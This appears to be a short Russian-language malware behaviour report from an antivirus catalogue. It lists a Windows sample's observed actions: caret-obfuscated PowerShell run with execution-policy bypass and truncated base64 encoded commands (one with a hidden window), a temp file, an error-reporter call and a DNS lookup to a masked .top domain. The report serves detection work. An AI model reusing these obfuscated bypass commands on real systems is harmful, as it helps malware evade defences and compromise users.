Техническая информация
- '<SYSTEM32>\cmd.exe' /c P^O^W^E^R^S^H^E^L^L -exec Bypass -EC JABNAEcAdgBMAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAIgBDAG8AbQBtAG8AbgBBAHAAcABsAGkAY...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1440
- %TEMP%\1455551.cvr
- DNS ASK b6##wvi.top
- '<SYSTEM32>\cmd.exe' /c P^O^W^E^R^S^H^E^L^L -exec Bypass -EC JABNAEcAdgBMAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAIgBDAG8AbQBtAG8AbgBBAHAAcABsAGkAY...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec Bypass -EC JABNAEcAdgBMAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAIgBDAG8AbQBtAG8AbgBBAHAAcABsAGkAYwBhAHQAaQBvAG4ARABhAHQA...